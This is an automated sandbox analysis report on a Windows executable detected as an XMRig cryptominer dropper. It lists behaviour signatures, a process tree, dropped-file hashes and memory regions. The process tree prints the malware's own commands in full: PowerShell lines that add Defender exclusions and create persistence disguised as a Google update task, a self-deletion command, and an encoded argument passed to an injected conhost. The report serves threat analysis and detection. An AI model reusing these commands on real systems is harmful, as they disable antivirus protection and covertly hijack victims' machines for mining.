Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1798s
  • max time network
    1800s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3436
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2776
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4168
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1100
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\DLKFnAGYJBNTnxwq.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4220
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:4392
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3036
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:2464
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2200
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4340
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:4808
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4272
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:936
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3844
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1508
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:3960

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            669KB

            MD5

            a2d9681a7646bbe1f28c97334cb91905

            SHA1

            a1355c7ce050e56964fa24f61114752a289bb22e

            SHA256

            073ffac03f8d5ef65db47897e51fb27c0e020265c21a83f452e47325e170dcc7

            SHA512

            a5859f9e3a4750f5dddacecc60a5648fa45a2cb0aa0d9cd8e19964bbb820df54b2d4977eb778433a02d1d328450aff010960053be5c0cf596d59804a9b71af7c

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            1.8MB

            MD5

            52d5363b2f26eaa9f176d5be3315e27d

            SHA1

            2450f9314a6b7b4ee0b3b0e91f35de258acbd700

            SHA256

            166d066f0d38a1bb31cc407d93baa659326b9612ce437a248ea8abc71c710794

            SHA512

            f90f8f116fae0b6086b86caf55d56296bd11531651f0dee0ca87ab24f647083f82b2ed971700fec833ec27ed696e5747e8d8f86c11ab32903ff1426e084ad407

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            cb3a799921d48256ab45414af88b0aa8

            SHA1

            8888fb5656f5f11576c0fbc3ba45d7df56000d28

            SHA256

            5ad60a0e324106c6b5a8a7c41b4eac83234ed53cf26025dd4d63c0750b265105

            SHA512

            21b53b49d0f95cb600444b15a274c31d9374ae96dc2ab464e6ada96bae11f1000e92f6f51f62e5b91891dbbb30e6ab9c71006a9a166b8d4ae24457dcd7efdf69

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            20b2f6ad2d2accd37fbd46b9d9bf8989

            SHA1

            91db3ff9493d1ab55efb65b715a2a8c61a72adbd

            SHA256

            32fef7d0dd7c43bd3440fca325e363d04b667c385d13d4dd44528f35b0167bed

            SHA512

            acf13e39320da7837d169c2575d6575eb638f41f6deead0915785269effebe334adc5f8d73d6621aa4eea047b261fabd50ffc9449f47126953534059e8ff7501

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_thrjxmca.1si.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/936-129-0x00007FF672F10000-0x00007FF672F26000-memory.dmp
            Filesize

            88KB

          • memory/936-122-0x00007FF672F10000-0x00007FF672F26000-memory.dmp
            Filesize

            88KB

          • memory/1100-28-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/1100-31-0x000001E74A3E0000-0x000001E74A3F0000-memory.dmp
            Filesize

            64KB

          • memory/1100-33-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/1100-30-0x000001E74A3E0000-0x000001E74A3F0000-memory.dmp
            Filesize

            64KB

          • memory/1100-29-0x000001E74A3E0000-0x000001E74A3F0000-memory.dmp
            Filesize

            64KB

          • memory/1508-51-0x00007FF617060000-0x00007FF617271000-memory.dmp
            Filesize

            2.1MB

          • memory/1508-115-0x00007FF617060000-0x00007FF617271000-memory.dmp
            Filesize

            2.1MB

          • memory/2200-52-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/2200-76-0x0000025672B50000-0x0000025672B6C000-memory.dmp
            Filesize

            112KB

          • memory/2200-85-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/2200-82-0x000002566FE10000-0x000002566FE20000-memory.dmp
            Filesize

            64KB

          • memory/2200-54-0x000002566FE10000-0x000002566FE20000-memory.dmp
            Filesize

            64KB

          • memory/2200-53-0x000002566FE10000-0x000002566FE20000-memory.dmp
            Filesize

            64KB

          • memory/2200-73-0x0000025672900000-0x000002567291C000-memory.dmp
            Filesize

            112KB

          • memory/2200-74-0x0000025672920000-0x00000256729D5000-memory.dmp
            Filesize

            724KB

          • memory/2200-75-0x00000256729E0000-0x00000256729EA000-memory.dmp
            Filesize

            40KB

          • memory/2200-81-0x0000025672B80000-0x0000025672B8A000-memory.dmp
            Filesize

            40KB

          • memory/2200-77-0x0000025672B30000-0x0000025672B3A000-memory.dmp
            Filesize

            40KB

          • memory/2200-78-0x0000025672B90000-0x0000025672BAA000-memory.dmp
            Filesize

            104KB

          • memory/2200-79-0x0000025672B40000-0x0000025672B48000-memory.dmp
            Filesize

            32KB

          • memory/2200-80-0x0000025672B70000-0x0000025672B76000-memory.dmp
            Filesize

            24KB

          • memory/2776-35-0x00007FF702850000-0x00007FF702A61000-memory.dmp
            Filesize

            2.1MB

          • memory/2776-0-0x00007FF702850000-0x00007FF702A61000-memory.dmp
            Filesize

            2.1MB

          • memory/3036-50-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/3036-36-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/3036-46-0x0000020AF3D50000-0x0000020AF3D60000-memory.dmp
            Filesize

            64KB

          • memory/3844-117-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-138-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-184-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-182-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-180-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-178-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-176-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-116-0x000001667DFA0000-0x000001667DFC0000-memory.dmp
            Filesize

            128KB

          • memory/3844-174-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-172-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-121-0x000001667E5C0000-0x000001667E5E0000-memory.dmp
            Filesize

            128KB

          • memory/3844-170-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-123-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-125-0x000001667EC00000-0x000001667EC20000-memory.dmp
            Filesize

            128KB

          • memory/3844-124-0x000001667E5E0000-0x000001667E600000-memory.dmp
            Filesize

            128KB

          • memory/3844-127-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-128-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-168-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-130-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-131-0x000001667E5E0000-0x000001667E600000-memory.dmp
            Filesize

            128KB

          • memory/3844-132-0x000001667EC00000-0x000001667EC20000-memory.dmp
            Filesize

            128KB

          • memory/3844-134-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-136-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-166-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-140-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-142-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-144-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-146-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-148-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-150-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-152-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-154-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-156-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-158-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-160-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-162-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/3844-164-0x00007FF77C020000-0x00007FF77C814000-memory.dmp
            Filesize

            8.0MB

          • memory/4168-10-0x000002D569DE0000-0x000002D569E02000-memory.dmp
            Filesize

            136KB

          • memory/4168-11-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/4168-12-0x000002D54F750000-0x000002D54F760000-memory.dmp
            Filesize

            64KB

          • memory/4168-13-0x000002D54F750000-0x000002D54F760000-memory.dmp
            Filesize

            64KB

          • memory/4168-16-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/4340-98-0x0000019BE1800000-0x0000019BE1810000-memory.dmp
            Filesize

            64KB

          • memory/4340-97-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/4340-111-0x00007FF9ACEE0000-0x00007FF9AD9A1000-memory.dmp
            Filesize

            10.8MB

          • memory/4340-109-0x0000019BE1800000-0x0000019BE1810000-memory.dmp
            Filesize

            64KB

          • memory/4340-108-0x0000019BE1800000-0x0000019BE1810000-memory.dmp
            Filesize

            64KB